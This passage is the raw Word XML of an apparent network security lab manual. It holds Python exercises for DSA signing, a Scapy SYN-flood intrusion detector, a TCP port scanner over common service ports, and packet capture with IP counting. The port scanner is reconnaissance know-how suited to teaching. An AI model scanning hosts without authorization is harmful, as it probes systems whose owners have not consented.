        <w:ind w:left="1079" w:hanging="359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Standard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BC0DCA3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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DD16BC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from cryptography.hazmat.primitives.asymmetric import dsa</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CBDE2A4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from cryptography.hazmat.primitives import hashes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAC9E31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from cryptography.hazmat.primitives.asymmetric import padding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283DBE3B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63B79DCC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def generate_dsa_keys():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162D7613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Generate a new DSA private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69177E02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private_key = dsa.generate_private_key(key_size=2048)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4549FB07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return private_key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42300F63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48CB2C9F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def sign_message(private_key, message):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="357B9991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Sign the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61BF264B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signature = private_key.sign(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2CE42F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message.encode(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3AD037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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        hashes.SHA256()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7152B29B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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C9AE257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return signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CE9EB2A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24EF6FA5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def verify_signature(public_key, message, signature):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="109AC810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try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF9CD5B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# Verify the signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3647D0BC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public_key.verify(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1F8A5E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    signature,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="610C42B0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    message.encode(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E675499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    hashes.SHA256()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D253252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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27084B3B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print("Signature is valid!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043AEF4D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return True</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63FB20C8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except:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34258142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print("Signature verification failed!")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DDC8A55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return False</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B3B20D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78C26806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def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551D9D13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Example usage</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C1FB525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message = "This is a message for digital signing."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17754514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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08E7D4D4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Generate private key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40DC8436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private_key = generate_dsa_keys()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66C8D21F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public_key = private_key.public_key()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4131EC8B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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334C5EF2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Sign the message</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13E34A93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signature = sign_message(private_key, message)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B0A905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print("Signature (hex):", signature.hex())</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4150E076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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56BFD8D2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Verify the signature</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18EDD4D8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verify_signature(public_key, message, signature)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B332A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</w:p>
    <w:p w14:paraId="03B6C427" w14:textId="77777777" w:rsidR="00A86E35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lastRenderedPageBreak/>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A3587B1" w14:textId="158FC33E" w:rsidR="00541377" w:rsidRPr="00A86E35" w:rsidRDefault="00A86E35" w:rsidP="00A86E35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="137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main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17654097" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRPr="00A86E35" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="139"/>
        <w:ind w:left="1079" w:hanging="359"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Demonstrate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intrusion detection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(IDS)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s/w.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7925481A" w14:textId="77777777" w:rsidR="00A86E35" w:rsidRDefault="00A86E35" w:rsidP="00A86E35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="139"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19A59960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#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F9C129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from scapy.all import sniff, IP, TCP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0873E7BD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from collections import defaultdict</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="618DE6B8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import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD91ADE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import warnings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72E875BC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</w:p>
    <w:p w14:paraId="5AF9AB40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# Suppress all warnings (including CryptographyDeprecationWarning)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="372B9D21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warnings.filterwarnings("ignore")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F37BD87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</w:p>
    <w:p w14:paraId="386EA2E9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# Dictionary to count SYN packets per source IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="076C8756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syn_count = defaultdict(int)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="699094AE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THRESHOLD = 5  # Alert if more than 5 SYN packets in 10 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA4B804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</w:p>
    <w:p w14:paraId="4C34655E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def packet_handler(packet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1121A0EA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Check if the packet has TCP and IP layers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5226FBB6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if packet.haslayer(TCP) and packet.haslayer(IP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C9352A1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tcp_layer = packet.getlayer(TCP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD5B856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ip_layer = packet.getlayer(IP)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="740DB0E0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# Check if the packet is a SYN packet (and not an ACK)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C478878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if tcp_layer.flags == "S":  # SYN flag is represented as "S" in Scapy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F4B509D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    syn_count[ip_layer.src] += 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37607BE4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</w:p>
    <w:p w14:paraId="0B7DA030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def monitor_syn_packets(duration=10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D771A6A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print("Starting IDS monitoring for SYN packets...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D3D5191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start_time = time.time()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="046EE14D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Sniff packets for the specified duration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC5EE3D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sniff(prn=packet_handler, timeout=duration, store=False)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40515488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# Analyze the results after sniffing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24ABFE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for ip, count in syn_count.items():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E6E6CC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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if count &gt; THRESHOLD:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D30EA70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        print(f"ALERT: High number of SYN packets ({count}) from {ip}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089EABB9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</w:p>
    <w:p w14:paraId="4A2E9460" w14:textId="77777777" w:rsidR="00A86E35" w:rsidRPr="00A86E35" w:rsidRDefault="00A86E35" w:rsidP="00A86E35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="139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>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3927B5" w14:textId="77FEFB3E" w:rsidR="00A86E35" w:rsidRPr="00A86E35" w:rsidRDefault="00A86E35" w:rsidP="00A86E35">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="139"/>
        <w:ind w:firstLine="0"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A86E35">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    monitor_syn_packets()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226BA498" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="101"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:before="41" w:line="276" w:lineRule="auto"/>
        <w:ind w:right="356"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Automated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Penetration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Exploring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N-Stalker,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Vulnerability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Assessment Tool.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CDC8BC1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="46A763E8" w14:textId="77777777" w:rsidR="009458AD" w:rsidRDefault="009458AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28FC721A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>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B21B0B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>import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06C47FC4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</w:p>
    <w:p w14:paraId="3B6644F7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>def scan_ports(target, ports):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D708B80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print(f"Scanning target: {target}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41A48A30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for port in ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6056215C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with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634AC307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s.settimeout(1)  # Timeout in seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4628C001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result = s.connect_ex((target, port))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245AC5C0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if result == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496112FE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    print(f"Port {port} is OPEN")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C22759D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else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4106CB9F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    print(f"Port {port} is CLOSED")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CBE6675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            </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6D6C38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>def main():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DD98C1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target = input("Enter target IP or hostname for port scanning: ").strip()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7739FA0E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# List of common ports to scan</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="063AD20B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common_ports = [21, 22, 23, 25, 53, 80, 110, 139, 143, 443, 445, 3306, 3389]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1998934A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 xml:space="preserve">    scan_ports(target, common_ports)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D574691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</w:p>
    <w:p w14:paraId="683AE37E" w14:textId="77777777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</w:pPr>
      <w:r w:rsidRPr="009458AD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>if __name__ == "__main__":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1696167D" w14:textId="3636492B" w:rsidR="009458AD" w:rsidRPr="009458AD" w:rsidRDefault="009458AD" w:rsidP="009458AD">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:spacing w:line="276" w:lineRule="auto"/>
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:sectPr w:rsidR="009458AD" w:rsidRPr="009458AD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458AD">
        <w:rPr>
          <w:b/>
          <w:color w:val="FF0000"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    main()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E986E4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81" w:line="237" w:lineRule="auto"/>
        <w:ind w:right="728"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analyze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Visualize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Subnetting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Scapy and Matplotlib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E88543" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="5"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E4D2A2A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1576A66" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="783"/>
      </w:pP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subnetting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utilizes Scapy for network packet analysis and Matplotlib for visualization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11997611" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="475327B1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5C269B83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5028C974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Scapy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analysis)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47C55150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(for data </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>visualization)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CD52A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NumPy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(for data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manipulation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AE90D1D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 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local network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packet </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>capture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A8E4C7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F5D9EED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25A6D506" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C470260" w14:textId="77777777" w:rsidR="00A16F47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Libraries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32E363" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="99"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="273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prompt.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A49FD86" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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38FA5C4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48D730DC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scapy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matplotlib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numpy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="027A4DE7" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="49"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290B5290" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 by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python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and importing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libraries:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="326B2845" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F4B442" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080" w:right="5638"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>import scapy.all as scapy import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matplotlib.pyplot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plt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB435F8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="180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numpy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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> np</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35875DCF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2526ABA3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2"/>
        </w:rPr>
        <w:t>Addresses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57935319" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="14"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="49E7B97A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1080"/>
        </w:tabs>
        <w:spacing w:line="232" w:lineRule="auto"/>
        <w:ind w:right="1303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ip_analysis.py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packets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IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C35D87" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="98"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:before="11"/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Scapy‟s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0"/>
        </w:rPr>
        <w:t>sniff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packets:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E7E693" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="798569C5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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scapy.all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sniff</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E3798A4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05E7789D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/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capture_packets(packet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C0AD8E2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="1757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packet.haslayer(scapy.IP):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F1244" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1" w:line="226" w:lineRule="exact"/>
        <w:ind w:left="2237"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"Source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IP: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{packet[scapy.IP].src},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Destination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pacing w:val="-5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13DCB570" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/>
        <w:ind w:left="1277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{packet[scapy.IP].dst}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15295166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6D246302" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1997"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sniff(prn=capture_packets,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count=10)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="42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Capture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packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27F74355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53DED43E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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 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that 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2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IPs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displayed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2681297D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="44216784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 xml:space="preserve">Allocation and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Subnetting</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508D1B41" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505B6075" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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Modify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 captured</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>IPs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occurrences.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C904C28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C68AB3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="272"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="29C3CBA5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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for IP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576851E1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9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script:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="581A15E1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BC63D37" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1277" w:right="5229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collections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Counter import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matplotlib.pyplot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5"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>plt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F275712" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226"/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ip_count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Counter()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344438E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CE0555D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact"/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capture_packets(packet):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15377BCC" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2237" w:right="2222" w:hanging="480"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>if packet.haslayer(scapy.IP): ip_count[packet[scapy.IP].src]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10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C94FEA1" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/>
        <w:ind w:left="2237"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>ip_count[packet[scapy.IP].dst]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10"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AF91ED6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="4" w:line="450" w:lineRule="atLeast"/>
